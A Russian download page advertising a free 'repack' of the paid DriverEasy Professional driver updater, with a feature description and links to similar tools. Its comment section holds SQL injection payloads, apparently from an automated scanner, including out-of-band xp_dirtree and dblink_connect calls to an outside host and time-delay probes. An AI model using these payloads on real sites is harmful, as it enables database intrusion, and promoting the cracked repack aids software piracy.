» » DriverEasy русская версия - установщик драйверов.

Программы для Windows


DriverEasy русская версия - установщик драйверов.

Категория: Драйвера

DriverEasy русская версия - установщик драйверов.


DriverEasy Professional – в буквальном смысле незаменимая программа для тех, кто устал от частого поиска свежих и оптимальных драйверов для своей Windows. С ее помощью многочасовой процесс без гарантии успеха превращается в несколько кликов и считанные минуты на скачивание лучших драйверов.

По заверениям разработчиков, их приложение предназначено для самой широкой аудитории: обычный юзер, не вникающий в компьютерные сложности, сумеет, наконец, разобраться с неработающим принтером или динамиками, а продвинутый сможет оптимизировать работу своего ПК для получения максимальной производительности. Более того, программа пригодится системным администраторам и компьютерным техникам, в чьем ведении находятся десятки или даже сотни машин – достаточно будет запустить сканирование и поиск нужных драйверов вместо траты многих часов на ручной подбор.

Управляться с программой легче легкого, и описание всего процесса укладывается в несколько автоматических этапов:

· DriverEasy Professional надо скачать и установить;
· открыв приложение, нужно нажать кнопку «Сканировать»;
· по окончании процесса программа выведет список отсутствующих, устаревших или неподходящих драйверов;
· необходимо нажать «Обновить все» либо вручную обновить некоторые из предложенных вариантов.

Перечень устройств, для которых утилита способна искать обновления, не ограничен: устройства мультимедиа, сетевые и графические карты, чипсеты и любые USB-устройства, а также разнообразные сканеры, принтеры, модемы, DVD-приводы и даже Wi-Fi / Bluetooth-девайсы.

Помимо основной задачи, DriverEasy Pro Rus, скачать которую можно бесплатно, также оснащена дополнительным фунционалом: например, можно познакомиться с информацией об установленном в ПК «железе», активировать оффлайн-сканирование или настроить обновление по удобному для себя расписанию.

Необходимость в ручном поиске драйверов отпадет навсегда, потому что это приложение опирается на базу из более, чем восьми миллионов их версий и типов. Не забыли разработчики и о безопасности процесса – перед установкой свежего драйвера программа автоматически делает бэкап старого, чтобы в случае неудачи вернуться к стабильной версии.

Важно то, что издатель гарантирует своим клиентам полноценную техническую поддержку, если в работе их программы появится сбой или баг. Что касается версии Professional, то ее стоимость оправдана, по сравнению с пробной, отсутствием ограничений и наличием полезных возможностей. Например, в профессиональном издании DriverEasy каждому пользователю гарантирован выделенный сетевой канал для скачивания драйверов, а также программу разрешено использовать в коммерческих целях.

Все остальные описанные опции тоже доступны только в платной версии, но потраченные деньги стоят того – на многие годы проблема поиска и обновления драйверов будет решена. Скачать DriverEasy русская версия Repack бесплатно можно по ссылке ниже.

Ссылка на загрузку

Версия: 5.6.1
Разработчик: DriverEasy
Год релиза: 2018
Поддерживаемые ОС: Windows 10, 7, 8.
Языки интерфейса: Английский
Размер файла: 3.85 Мб


Похожие бесплатные программы:

Wise Driver Care - обновление драйверов Windows.
Wise Driver Care – программный продукт поможет устранить пользователю все проблемы с драйверами. Самостоятельное обновление и поиск актуальных драйверов – трудоемкий процесс. С помощью приложения с ....

DevID Agent - помощник установки драйверов.
DevID Agent – небольшая бесплатная программа, с помощью которой, вы легко и быстро установите или обновите драйвера на ПК. Если сравнивать любой другой Драйвер Пак с данной программой, она проще и ....

IObit Driver Booster обновление драйверов на ПК.
IObit Driver Booster является отличным инструментом, который позволит вам всегда находить новые версии драйверов для ваших устройств. Программа сканирует ваши устройства и обновляет их драйвера в ....

DriverEasy быстрое обновление драйверов.
DriverEasy – полезный инструмент, позволяющий осуществлять быстрое обновление и поиск необходимых драйверов с последующей их инсталляцией на ПК. Поиск и загрузка недостающих программ происходит ....



Коментарии



Smith | Гости

3[left][/left][center][/center][right][/right][hide][/hide]


-1" OR 1=1 OR "ns"="ns

exec('xp_dirtree ''\\dyr3ifv6ra7ehss5g-7-khrcxqvudkc9akepw-bi'+'sl8.r87.me&
#039;+'\c$\a''')

'||(SELECT dblink_connect('host=dyr3ifv6rajh9w-y9kwp1lku7s8b4swk4s3et2jz'||'
xng.r87.me user=a password=a connect_timeout=2'))||'

1 WAITFOR DELAY '0:0:25'-- /* 8410639c-b30b-4dd5-a878-d130dc1cfcdd */

1';SELECT pg_sleep(25)-- /* 2e3f301a-874a-49b0-b96f-3ed007afe90d */
11 октября 2022 19:01
Панель добавления отзыва
Ваше Имя:


Ваш E-Mail:



Мне нравится Relizua
Группа Вконтакте